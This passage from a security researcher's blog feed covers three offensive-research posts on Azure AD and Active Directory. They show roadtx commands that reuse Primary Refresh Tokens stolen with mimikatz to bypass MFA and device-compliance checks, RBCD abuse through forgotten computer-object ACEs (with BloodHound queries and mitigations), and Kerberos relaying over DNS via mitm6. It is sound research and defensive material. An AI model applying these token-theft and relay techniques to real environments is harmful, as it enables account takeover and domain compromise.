<p><img src="/assets/img/roadtx/mimikatz_dump.png" alt="dumping PRT with mimikatzz" /></p>

<p>To make our life easier, we renew the PRT first, which will save it in <code class="language-plaintext highlighter-rouge">roadtx.prt</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -a renew --prt &lt;PRT From mimikatz&gt; --prt-sessionkey &lt;clear key from mimikatz&gt;
</code></pre></div></div>

<p>Now we can request tokens using the interactive browser with <code class="language-plaintext highlighter-rouge">roadtx browserprtauth</code>. If we use the <code class="language-plaintext highlighter-rouge">roadtx describe</code> command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx browserprtauth
roadtx describe &lt; .roadtools_auth
</code></pre></div></div>

<p><img src="/assets/img/roadtx/roadtx_describe.png" alt="MFA claim from the PRT" /></p>

<p>Similar to the previous command, we can also use this for interactive browsing in the Selenium window:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_prtauth.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_prtauth.webm" type="video/webm" />
</video>

<h2 id="primary-refresh-token-usage-with-other-accounts">Primary Refresh Token usage with other accounts</h2>
<p>An interesting use case for stolen Primary Refresh Tokens is that you can also use them for other accounts to add device claims to the authentication. For example, if there is a conditional access policy that requires a compliant or hybrid joined corporate device to access specific resources, the device claim originates from the primary refresh token used during authentication. This claim can also be used for other users. So if I have a stolen PRT from a compliant device for user <code class="language-plaintext highlighter-rouge">tpmtest@iminyour.cloud</code>, I can use this PRT with the credentials of <code class="language-plaintext highlighter-rouge">newlowpriv@iminyour.cloud</code> to sign in and pass the compliancy test.</p>

<p>In this example we still have the stolen PRT from <code class="language-plaintext highlighter-rouge">tpmtest@iminyour.cloud</code> used in the example above saved as <code class="language-plaintext highlighter-rouge">roadtx.prt</code>. I can use this PRT together with the credentials of <code class="language-plaintext highlighter-rouge">newlowpriv</code> that are stored in my KeePass file to sign in to Microsoft Teams and access data there with the <code class="language-plaintext highlighter-rouge">roadtx browserprtinject</code> command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx browserprtinject -u newlowpriv@iminyour.cloud -r msgraph -c msteams
</code></pre></div></div>

<p>The issued access token will contain the <code class="language-plaintext highlighter-rouge">deviceid</code> claim, which is the device from which we stole the PRT. Since this device is Intune managed and compliant, it passes the compliancy requirement:</p>

<p><img src="/assets/img/roadtx/logs_compliant.png" alt="MFA claim from the PRT" /></p>

<h2 id="adding-mfa-claims-to-an-existing-prt">Adding MFA claims to an existing PRT</h2>
<p>Moving back from the PRTs that we stole and back to the PRT we registered earlier using a username + password combination. If we want to have a PRT with MFA claim, we have to use an interactive session that will request a special refresh token from Azure AD for “enriching” our PRT. The command for this is <code class="language-plaintext highlighter-rouge">roadtx prtenrich</code>, which like the previous commands accepts an identity in a KeePass file to autofill the MFA information, or you can do this by hand.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich -u newlowpriv@iminyour.cloud
Got refresh token. Can be used to request prt with roadtx prt -r &lt;refreshtoken&gt;
</code></pre></div></div>

<p>The result is a special refresh token that we can use to request a new PRT. For this we go back to the <code class="language-plaintext highlighter-rouge">roadtx prt</code> module:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -r &lt;refreshtoken&gt; -c blogdevice.pem -k blogdevice.key
</code></pre></div></div>

<p>The new PRT is written to disk and when we use it to request tokens we see the MFA claim:</p>

<p><img src="/assets/img/roadtx/roadtx_prtmfa.png" alt="New PRT with MFA capabilities" /></p>

<p>We can use this PRT to obtain tokens for resources that require MFA using any of the above methods.</p>

<h1 id="single-sign-on-in-windows-using-chrome-and-a-custom-browsercore">Single sign on in Windows using Chrome and a custom browsercore</h1>
<p>In my <a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">first blog on PRTs</a> I described the process that Chrome uses to do Single Sign On in Windows. It uses the <code class="language-plaintext highlighter-rouge">browsercore.exe</code> helper program to request PRT cookies to sign in automatically. For roadtx I wrote a small utility called <code class="language-plaintext highlighter-rouge">browsercore.py</code>, which can be used as a replacement for <code class="language-plaintext highlighter-rouge">browsercore.exe</code>. By doing so, you can use a Primary Refresh Token from roadtx (or one that you stole elsewhere) to automatically authenticate in your Chrome browser on your attacker controlled host. You don’t need to have a Selenium window, but can use the PRT directly just as if you were on the victims machine in a legitimate browser.</p>

<p>The custom SSO requires a few steps to set up:</p>

<ul>
  <li>You should put the <code class="language-plaintext highlighter-rouge">browsercore.py</code> and <code class="language-plaintext highlighter-rouge">manifest.json</code> <a href="https://github.com/dirkjanm/ROADtools/tree/master/browsercore">files</a> in some location on disk, for example in <code class="language-plaintext highlighter-rouge">C:\browsercore\</code>.</li>
  <li>Install roadtx and place a <code class="language-plaintext highlighter-rouge">roadtx.prt</code> file in the same directory.</li>
  <li>Modify <code class="language-plaintext highlighter-rouge">HKEY_CURRENT_USER\Software\Google\Chrome\NativeMessagingHosts\com.microsoft.browsercore</code> to point to <code class="language-plaintext highlighter-rouge">C:\browsercore\manifest.json</code>.</li>
  <li>Test whether everything works using <code class="language-plaintext highlighter-rouge">bctest.py</code></li>
  <li>Clear any existing cookies in Chrome for <code class="language-plaintext highlighter-rouge">login.microsoftonline.com</code></li>
</ul>

<p>Full install instructions are on the <a href="https://github.com/dirkjanm/ROADtools/wiki/Setting-up-BrowserCore.py">ROADtools wiki</a>. After setup, Chrome should use the PRT automatically during sign in. The first time it may need a hint for the username to work properly.</p>

<p>With this setup you can browse any Azure AD connected resource with SSO and the claims from the PRT, including device status and cached MFA information.</p>

<h1 id="other-utilities">Other utilities</h1>
<p>There are a few other utilities in roadtx, mostly to make my own research easier:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">roadtx decrypt</code> can decrypt encrypted responses given a PRT session key or a device transport key</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx getotp</code> can calculate an OTP code from a seed or from the otp property stored in a KeePass file (if you need to do MFA for that user)</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx codeauth</code> can perform the OAuth2 code redemption flow for public and confidential clients.</li>
  <li><code class="language-plaintext highlighter-rouge">roadtx listaliases</code> lists all the aliases that are supported for resources and clients. If you need any other aliases that you use frequently feel free to open an issue or send me a message.</li>
</ul>

<h1 id="tool-download-future-work-and-credits">Tool download, future work and credits</h1>
<p>As always the tools are available and open source on <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> and on pypi with <code class="language-plaintext highlighter-rouge">pip install roadtx</code>. This toolkit was developed during my research of the past years and I will keep adding new stuff to it as that research progresses. Many of the commands currently only work in managed environments (so not in federated), simply because I have not had the time yet to set up a lab with federation.</p>

<p>Thanks to <a href="https://twitter.com/DrAzureAD">DrAzureAD</a> for developing <a href="https://aadinternals.com/aadinternals/">AADInternals</a>, which inspired the initial device registration development and was a helpful resource on several implementation details. Also a shoutout to <a href="https://github.com/rvrsh3ll/TokenTactics">TokenTactics</a> which implements many token request/refresh related flows in Powershell.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Ever since the initial release of ROADrecon and the ROADtools framework I have been adding new features to it, especially on the authentication side. As a result, it supports many forms of authentication, such as using Primary Refresh Tokens (PRTs), PRT cookies, and regular access/refresh tokens. The authentication modules are all part of the shared library roadlib, and can be used in other tools by importing the library. Even though you can request tokens for any Azure AD connected resource and with many client IDs, the only tool exposing this authentication part was ROADrecon. It always felt unnatural and illogical to tell people that you can use a recon tool to request tokens for many other purposes. So I decided to start writing a new tool, which resolves around requesting and using Azure AD tokens. As I was working on this, I started adding proof of concepts I wrote during my Azure AD devices research into the tool, adding support for registering devices and requesting Primary Refresh Tokens using device credentials. I also added various modules for injecting PRTs into browser sessions with Selenium, and for automating authentication with MFA. The result is a comprehensive tool called ROADtools Token eXchange, or simply roadtx. Currently it has the following capabilities:]]></summary></entry><entry><title type="html">Abusing forgotten permissions on computer objects in Active Directory</title><link href="https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory/" rel="alternate" type="text/html" title="Abusing forgotten permissions on computer objects in Active Directory" /><published>2022-07-11T16:08:57+00:00</published><updated>2022-10-27T08:08:57+00:00</updated><id>https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory</id><content type="html" xml:base="https://dirkjanm.io/abusing-forgotten-permissions-on-precreated-computer-objects-in-active-directory/"><![CDATA[<p>A while back, I read an interesting blog by <a href="https://twitter.com/Oddvarmoe">Oddvar Moe</a> about <a href="https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/">Pre-created computer accounts</a> in Active Directory. In the blog, Oddvar also describes the option to configure who can join the computer to the domain after the object is created. This sets an interesting ACL on computer accounts, allowing the principal who gets those rights to reset the computer account password via the “All extended rights” option. That sounded quite interesting, so I did some more digging into this and found there are more ACLs set when you use this option, which not only allows this principal to reset the password but also to configure Resource-Based Constrained Delegation. BloodHound was missing this ACL, and I dug into why, which I’ve written up in this short blog. If an environment is sufficiently large (and/or old), someone at some point likely added a few systems to the domain with this option set to “Everyone” or “Authenticated Users”, allowing all users in the domain to join the computer to the domain. Whoever configured this probably did not realize this would also give everyone specific permissions on the object after it is joined to the domain. The logic to analyze this is now included in the <a href="https://github.com/fox-it/BloodHound.py">BloodHound.py</a> data gatherer, as well as a <a href="https://github.com/BloodHoundAD/SharpHoundCommon/pull/34">Pull Request</a> for SharpHound. If this misconfiguration is present in a domain, it may give you access to servers from any user. This makes for an easy first step in lateral movement. Along the way, I discovered more cases in which these ACEs were present, so in any larger environment, there’s a good chance that unintended users have some lingering permissions on computer objects. This post includes some queries to use in BloodHound, as well as some recommended mitigations.</p>

<p><img src="/assets/img/computeracl/join.png" alt="Everyone can join this to the domain" class="align-center" /></p>

<h1 id="background">Background</h1>
<p>After reading Oddvar’s blog, I wondered what rights are granted to users when the option “The following user or group can join this computer to the domain”. So I did some tests and set this value to a newly created user “computeracltest”. After creating this computer object, we see that various Access Control Entries (ACEs) are set to this new computer, granting rights to the account we chose. As usual, the GUI is not really helpful here since it shows weird blank values and some instances of “special” which are quite ambiguous.</p>

<p><img src="/assets/img/computeracl/aclview.png" alt="The ACEs set on the new object" class="align-center" /></p>

<p>The “effective access” view is more practical and shows us some interesting additional information: the user can write to the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, which is the attribute that gives us access to configure Resource-Based Constrained Delegation.</p>

<p><img src="/assets/img/computeracl/effectiveaccess.png" alt="Effective access showing RBCD rights" class="align-center" /></p>

<p>How we got that access is not quite clear from the ACE view. Some of the ACEs may not be adequately understood by the GUI. So instead, let us look at the raw ACL and what its entries mean. My preferred tool to make these entries readable is the ACL parsing logic of BloodHound.py, which has some extensive parsing logic and debug printing built-in. Because I did this analysis with a newly created user, the only ACEs that matter are those set to that specific user. If we print any ACE we encounter that applies to this user’s SID, which can be done by <a href="https://github.com/fox-it/BloodHound.py/blob/dev/bloodhound/enumeration/acls.py#L82">modifying these lines</a> in BloodHound.py, we can see what ACEs we have.</p>

<p><img src="/assets/img/computeracl/acelist.png" alt="List of ACEs on our computer object for our test user" class="align-center" /></p>

<p>The ACEs can be separated by type, which is based on the flags of the ACE. ACE numbers 1-4 and 7 have the flag <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_WRITE_PROP</code>, which indicates that this ACE controls access for writing to a property, indicated by the GUID in <code class="language-plaintext highlighter-rouge">ObjectType</code>. ACE number 5 and 6 have the <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_SELF</code> flag, which is a bit confusing name for a validated write according to the <a href="https://docs.microsoft.com/en-us/windows/win32/api/iads/ne-iads-ads_rights_enum">documentation</a>. Validated writes also allow you to write to a property, but the write is subject to additional validation. An example is ACE number 5, which is the validated write to the DNS hostname with <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-validated-dns-host-name">restrictions</a>. ACE number 8 is a simpler ACE not restricted to a specific property but with the <code class="language-plaintext highlighter-rouge">ADS_RIGHT_DS_CONTROL_ACCESS</code> flag. This flag controls extended rights, and since there is no specific extended right specified, this ACE grants the “all extended rights” permissions that Oddvar wrote about in his blog.</p>

<p>Ignoring these leaves us with a few ACEs to inspect, each of which grants write access to a specific property. The property IDs are mapped to names in the Active Directory schema, but we can also put the GUIDs in Google to find the corresponding property in the Microsoft documentation. This gives the following properties:</p>

<ol>
  <li><code class="language-plaintext highlighter-rouge">5F202010-79A5-11D0-9020-00C04FC2D4CF</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-logon">User-Logon property set</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">BF967950-0DE6-11D0-A285-00AA003049E2</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-description">Description attribute</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">BF967953-0DE6-11D0-A285-00AA003049E2</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-displayname">Display-Name attribute</a>.</li>
  <li><code class="language-plaintext highlighter-rouge">3E0ABFD0-126A-11D0-A060-00AA006C33ED</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/a-samaccountname">SAM-Account-Name attribute</a>.</li>
  <li>Validated write to DNS host name (I’ve written about <a href="https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/">this right</a> before).</li>
  <li>Validated write to service principal name.</li>
  <li><code class="language-plaintext highlighter-rouge">4C164200-20C0-11D0-A768-00AA006E0529</code>: <a href="https://docs.microsoft.com/en-us/windows/win32/adschema/r-user-account-restrictions">User-Account-Restrictions property set</a>.</li>
</ol>

<p>The above pages give us several attributes, but none that make it clear why we have the rights on the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute. For this, we have to dig deeper into numbers 1 and 7, which are property sets instead of single attributes.</p>

<h2 id="property-sets-in-active-directory">Property sets in Active Directory</h2>
<p>If you don’t know what property sets are or how exactly they work, don’t worry, I didn’t either before diving into this. Some searching in the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca">documentation</a> teaches us that a property set maps to multiple properties, so you don’t have to create an ACE for every single property you want to grant access to. Unfortunately, the documentation for the property sets linked in the list above is not updated beyond Server 2012, so it doesn’t tell us what properties are included in these sets on more modern OS versions. Back to querying this from the AD schema, where all these properties are defined. When we look at the properties of the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, we see that it references <code class="language-plaintext highlighter-rouge">attributeSecurityGUID</code> <code class="language-plaintext highlighter-rouge">4C164200-20C0-11D0-A768-00AA006E0529</code>:</p>

<p><img src="/assets/img/computeracl/securityguid.png" alt="Allowed to act property privileges part of a property set" class="align-center" /></p>

<p>This is the same GUID as we saw for “User-Account-Restrictions” that we saw for ACE number 7 above. A look at the Extended Rights configured in the Configuration partition of AD shows us the same GUID for the User-Account-Restrictions property set.</p>

<p><img src="/assets/img/computeracl/rightsguid.png" alt="GUID of the user account restrictions property set" class="align-center" /></p>

<p>We can use this information to reconstruct all the property sets and the properties they contain in the default AD schema by creating a mapping between the properties and their set (if any). I’ve written a short <a href="https://gist.github.com/dirkjanm/5e1e525c35ac846fa304eaa02c871c00">python script</a> that does just that, which gives us all the attributes contained in the User-Account-Restrictions property set, including <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code>.</p>

<p><img src="/assets/img/computeracl/uarset.png" alt="All attributes in the user account restrictions property set" class="align-center" /></p>

<p>With this, we can conclude that it’s ACE number 7 that gives us the rights to modify the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute, which allows us to configure Resource-Based Constrained Delegation.</p>

<h1 id="abusing-the-everyone-case-and-more-abuse-options">Abusing the “Everyone” case and more abuse options</h1>
<p>To go back to our original idea, when an admin adds a computer to the domain and gives “everyone” or “authenticated users” the permission to join the computer to the domain, these groups also get the permission to configure RBCD. If we add this extra logic to the BloodHound data collector and run it again, we will see these new “AddAllowedToAct” edges showing up in our data. There is a second case in which these permissions get set, which is when a computer object is created via LDAP, in which case the user that created the account will get the permissions that allow them to configure RBCD. This may be another lateral movement opportunity in case an attacker compromises an account that is commonly used to join machines to the domain.</p>

<p>After adding the new ACL property logic to BloodHound.py, and diffing the output with SharpHound, we see the extra <code class="language-plaintext highlighter-rouge">AddAllowedToAct</code> edges showing up:</p>

<p><img src="/assets/img/computeracl/datadiff.png" alt="More ACL info" class="align-center" /></p>

<p>Loading this data into BloodHound, we can use the following query to find our nice new edges. <strong>Note:</strong> the edge was renamed to <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code> after merging into the main BloodHound code. Both SharpHound and BloodHound.py now report this as <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code>, so the query changes from the naming used above:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MATCH p=(g)-[:WriteAccountRestrictions]-&gt;(c:Computer) WHERE NOT g.highvalue RETURN p
</code></pre></div></div>

<p>Or to focus on cases exploitable from any authenticated user, the following query is useful:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MATCH p=(g)-[:WriteAccountRestrictions]-&gt;(c:Computer) WHERE g.objectid ENDS WITH "S-1-1-0" OR g.objectid ENDS WITH "-513" OR g.objectid ENDS WITH "S-1-5-11" OR g.objectid ENDS WITH "-515" RETURN p
</code></pre></div></div>

<p>This shows the following result in my test lab, since I added a computer with the “everyone” permissions to the domain:</p>

<p><img src="/assets/img/computeracl/bhresults.png" alt="Edge in BloodHound" class="align-center" /></p>

<p>We can configure RBCD by modifying the object over LDAP, for example by using <code class="language-plaintext highlighter-rouge">rbcd.py</code> from <a href="https://github.com/SecureAuthCorp/impacket/">impacket</a>. As a general reminder: to exploit this, you would need access to a computer account in most cases, which you can either do by dumping the credentials of an existing host from the registry, or by registering a new computer object in AD if that is allowed (which it is by default). In this case, I’m abusing <code class="language-plaintext highlighter-rouge">ICORP-W10</code> as an account for which I dumped the password.</p>

<p><img src="/assets/img/computeracl/writerbcd.png" alt="Modify the object to allow RBCD" class="align-center" /></p>

<p>As the last step, we can obtain a service ticket impersonating a Domain Admin account to access the victim host:</p>

<p><img src="/assets/img/computeracl/silverticket.png" alt="Request ticket impersonating an admin via RBCD" class="align-center" /></p>

<p>If this was a real computer instead of only a pre-created account, we could use this ticket to login in over SMB and for example run secretsdump.</p>

<h1 id="mitigating-and-monitoring">Mitigating and monitoring</h1>
<p>If you’re on the blue side, you can perform the same BloodHound queries to identify misconfigured computer objects. For the actual mitigation, remove the vulnerable ACEs on these objects. I recommend removing any ACE that was set to allow the specific user or group to domain join the computer, which are similar to the screenshot in the beginning of this blog and are all scoped to that user/group and set to “This object only”. At the minimum, remove the <strong>Write account restrictions</strong> and the <strong>Special</strong> (which means “All extended rights” in this case) ACEs.</p>

<p>Modifying the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute is not monitored by default in AD. Assuming you already have “Audit Directory Service Changes” audit logging enabled, an auditing entry (SACL) needs to be added to monitor changes to this attribute. You could configure this on the domain root or on all OUs/containers that contain computer objects. It should apply to “Descendant computer objects” and the property to monitor is <em>Write msDS-AllowedToActOnBehalfOfOtherIdentity</em> as shown below:</p>

<p><img src="/assets/img/computeracl/auditing_1.png" alt="Configure auditing" class="align-center" />
<img src="/assets/img/computeracl/auditing_2.png" alt="Configure auditing 2" class="align-center" /></p>

<p>Once this is set up, event ID 5136 will be logged whenever RBCD is changed on a computer object, which should rarely occur since I’ve yet to hear from someone using this legitimately.</p>

<p><img src="/assets/img/computeracl/auditing_3.png" alt="RBCD modification event" class="align-center" /></p>

<h1 id="other-changes-to-bloodhoundpy">Other changes to BloodHound.py</h1>
<p>This feature is now present in version 1.3.0 of BloodHound.py which is available from <a href="https://github.com/fox-it/BloodHound.py">GitHub</a> or via PyPi. There have been other improvements/optimizations that are included in this release:</p>

<ul>
  <li>Session enumeration via the HKU registry hive is now supported thanks to <a href="https://twitter.com/itm4n">@itm4n</a>.</li>
  <li>BloodHound.py will automatically chunk large JSON files to prevent huge files in large networks that the GUI crashes on while ingesting.</li>
  <li>When doing DCOnly collection, BloodHound.py will use its memory more efficiently and not cache everything when not needed.</li>
  <li>You can now supply a file with computer hostnames for session/loggedon/etc enumeration that will restrict enumeration to only those computers.</li>
  <li>Connections to LDAP that time out/are lost during data gathering are automatically re-established if possible.</li>
  <li>A new tool <code class="language-plaintext highlighter-rouge">createforestsidcache.py</code> is available that creates a cache of all objects in the entire forest. This creates massive speedups for multi-domain AD environments with a lot of cross-domain privileges.</li>
  <li>Bugfixes and general improvements.</li>
  <li>Python 2 support is dropped, only Python 3 is supported now.</li>
</ul>

<p>Something that is not quite new but was not publicly announced before is BloodHound.py’s capabilities to gather information about credentials stored on hosts in scheduled tasks or as part of services. While this method requires administrator privileges to collect, it does gather credentials that could be recoverable from hosts that aren’t always gathered using other session collection methods. You can activate these collection methods by adding <code class="language-plaintext highlighter-rouge">experimental</code> to your list of collection methods.</p>

<h1 id="tools">Tools</h1>
<p>The new ACL edge has been added to both BloodHound.py and the official BloodHound and it’s SharpHound data collector. The edge was renamed to <code class="language-plaintext highlighter-rouge">WriteAccountRestrictions</code> for clarity. If you have the latest version of BloodHound it should support this out-of-the-box without additional requirements. I think this kind of attack pattern may be common in the wild, but I don’t have any solid data on it, so if you find some instances of it when this is configured in real environments (either from the red side or the blue side), please let me know!</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[A while back, I read an interesting blog by Oddvar Moe about Pre-created computer accounts in Active Directory. In the blog, Oddvar also describes the option to configure who can join the computer to the domain after the object is created. This sets an interesting ACL on computer accounts, allowing the principal who gets those rights to reset the computer account password via the “All extended rights” option. That sounded quite interesting, so I did some more digging into this and found there are more ACLs set when you use this option, which not only allows this principal to reset the password but also to configure Resource-Based Constrained Delegation. BloodHound was missing this ACL, and I dug into why, which I’ve written up in this short blog. If an environment is sufficiently large (and/or old), someone at some point likely added a few systems to the domain with this option set to “Everyone” or “Authenticated Users”, allowing all users in the domain to join the computer to the domain. Whoever configured this probably did not realize this would also give everyone specific permissions on the object after it is joined to the domain. The logic to analyze this is now included in the BloodHound.py data gatherer, as well as a Pull Request for SharpHound. If this misconfiguration is present in a domain, it may give you access to servers from any user. This makes for an easy first step in lateral movement. Along the way, I discovered more cases in which these ACEs were present, so in any larger environment, there’s a good chance that unintended users have some lingering permissions on computer objects. This post includes some queries to use in BloodHound, as well as some recommended mitigations.]]></summary></entry><entry><title type="html">Relaying Kerberos over DNS using krbrelayx and mitm6</title><link href="https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/" rel="alternate" type="text/html" title="Relaying Kerberos over DNS using krbrelayx and mitm6" /><published>2022-02-22T18:08:57+00:00</published><updated>2022-02-22T18:08:57+00:00</updated><id>https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6</id><content type="html" xml:base="https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/"><![CDATA[<p>One thing I love is when I think I understand a topic well, and then someone proves me quite wrong. That was more or less what happened when James Forshaw published <a href="https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html">a blog on Kerberos relaying</a>, which disproves my conclusion that you can’t relay Kerberos from a <a href="https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/">few years ago</a>. James showed that there are some tricks to make Windows authenticate to a different Service Principal Name (SPN) than what would normally be derived from the hostname the client is connecting to, which means Kerberos is not fully relay-proof as I assumed. This triggered me to look into some alternative abuse paths, including something I worked on a few years back but could never get to work: relaying DNS authentication. This is especially relevant when you have the ability to spoof a DNS server via DHCPv6 spoofing with mitm6. In this scenario, you can get victim machines to reliably authenticate to you using Kerberos and their machine account. This authentication can be relayed to any service that does not enforce integrity, such as Active Directory Certificate Services (AD CS) http(s) based enrollment, which in turn makes it possible to execute code as SYSTEM on that host as discussed in my blog on <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">AD CS relaying</a>. This technique is faster, more reliable and less invasive than relaying WPAD authentication with mitm6, but does of course require AD CS to be in use. This blog describes the background of the technique and the changes I made to krbrelayx to support Kerberos relaying for real this time.</p>

<h1 id="kerberos-over-dns">Kerberos over DNS</h1>
<p>If you’re familiar with Kerberos you know that DNS is a critical component in having a working Kerberos infrastructure. But did you know that DNS in Active Directory also supports authenticated operations over DNS using Kerberos? This is part of the “Secure dynamic updates” operation, which is used to keep the DNS records of network clients with dynamic addresses in sync with their current IP address. The following image shows the steps involved in the dynamic update process:</p>

<p><img src="/assets/img/kerberos/krbdns_overview.png" alt="Kerberos over DNS" class="align-center" /></p>

<p>The steps are as follows (following the packets above from top to bottom). In this exchange the client is a Windows 10 workstation and the server is a Domain Controller with the DNS role.</p>

<ol>
  <li>The client queries for the Start Of Authority (SOA) record for it’s name, which indicates which server is authoritative for the domain the client is in.</li>
  <li>The server responds with the DNS server that is authorative, in this case the DC <code class="language-plaintext highlighter-rouge">icorp-dc.internal.corp</code>.</li>
  <li>The client attempts a dynamic update on the A record with their name in the zone <code class="language-plaintext highlighter-rouge">internal.corp</code>.</li>
  <li>This dynamic update is refused by the server because no authentication is provided.</li>
  <li>The client uses a <code class="language-plaintext highlighter-rouge">TKEY</code> query to negotiate a secret key for authenticated queries.</li>
  <li>The server answers with a <code class="language-plaintext highlighter-rouge">TKEY</code> Resource Record, which completes the authentication.</li>
  <li>The client sends the dynamic update again, but now accompanied by a <code class="language-plaintext highlighter-rouge">TSIG</code> record, which is a signature using the key established in steps 5 and 6.</li>
  <li>The server acknowledges the dynamic update. The new DNS record is now in place.</li>
</ol>

<p>Let’s take a closer look at steps 5 and 6. The TKEY query is actually sent over TCP because its quite a bit larger than the maximum 512 bytes allowed over UDP. This is primarily because of the rather large TKEY additional record, which contains structures we often see for Kerberos authentication:</p>

<p><img src="/assets/img/kerberos/dns_tkey.png" alt="TKEY query containing AP-REQ structure" class="align-center" /></p>

<p>It turns out this query contains a full GSSAPI and SPNEGO structure containing a Kerberos AP-REQ. This is essentially a normal Kerberos authentication flow to a service. The reply contains again a GSSAPI and SPNEGO structure indicating authentication succeeded, and replying with an AP-REP. This AP-REP contains a new session key that can be used by the client to sign their DNS queries via a <code class="language-plaintext highlighter-rouge">TSIG</code> record. Note that the <code class="language-plaintext highlighter-rouge">encAPRepPart</code> is normally encrypted with the session key that only the client and the server know, but because I loaded the Kerberos keys of various systems in my test domain into a <a href="https://github.com/dirkjanm/forest-trust-tools/blob/master/keytab.py">keytab</a> that Wireshark accepts, we can decrypt the whole exchange to see what it contains.</p>

<p><img src="/assets/img/kerberos/dns_tkey_answer.png" alt="TKEY answer containing AP-REP" class="align-center" /></p>

<p>The concept of this flow is fairly simple (the actual implementation is not). The client uses Kerberos to authenticate and securely exchange a session key, and then uses that session key to sign further update queries. The server can store the key and the authenticated user/computer and process the updates in an authenticated manner without having to tie an authentication to a specific TCP socket, as later queries may be sent over UDP.</p>

<h2 id="abusing-dns-authentication">Abusing DNS authentication</h2>
<p>If we are in a position to intercept DNS queries, it is possible to trick the victim client into sending us a Kerberos ticket for the real DNS server. This interception can be done in the default Windows configuration by any system in the same (V)LAN using <a href="https://github.com/dirkjanm/mitm6">mitm6</a>. mitm6 advertises itself as a DNS server, which means that the victim will send the <code class="language-plaintext highlighter-rouge">SOA</code> to our fake server, and authenticate using Kerberos if we refuse their dynamic update. Now this is where it gets a bit tricky. Usually the DNS server role will be running on a Domain Controller. So the service ticket for the DNS service will already be suitable for services running on the DC, since they use the same account and we can change the service name in the ticket. This means we can relay this ticket to for example LDAP. However, if we take a closer look at the authenticator in the TKEY query, we see that the flag that requests integrity (signing) is set.</p>

<p><img src="/assets/img/kerberos/krb_dns_signing.png" alt="Integrity flag set in authenticator" class="align-center" /></p>

<p>This will automatically trigger LDAP signing, which makes the whole attack fail since we can’t interact with LDAP afterwards without providing a valid cryptographic signature on each message. We can’t produce this signature since we relayed the authentication and do not actually possess the Kerberos keys required to decrypt the service ticket and extract the session key.</p>

<p>This initially made me hit a wall for two reasons:</p>

<ol>
  <li>At the time there weren’t any default high value services known that would accept authentication with the integrity flag set, but not enforce it on a protocol level.</li>
  <li>The client specifically requests the “dns” service class in the SPN they use in their Kerberos ticket request. This SPN is only set on actual DNS servers, so the number of legitimate hosts to relay to would be quite low.</li>
</ol>

<p>Revisiting this after reading James’ blog, I realized neither of these are an issue with todays knowledge:</p>

<ol>
  <li>Since the AD CS research was <a href="https://posts.specterops.io/certified-pre-owned-d95910965cd2">published</a> by Lee Christensen and Will Schroeder, we have a high-value endpoint that is present in most AD environments, and provides code execution possibilities on the victim, as described in my <a href="https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/">last blog on AD CS relaying</a>.</li>
  <li>As James describes in his <a href="https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html">blog</a>, many service classes will actually implicitly map to the HOST class. As it turns out, this includes DNS, so when our victim requests a ticket for the DNS service, this actually works for any account with the HOST SPN. This is set on all computer accounts in the domain by default, so any service running under these accounts can be targeted.</li>
</ol>

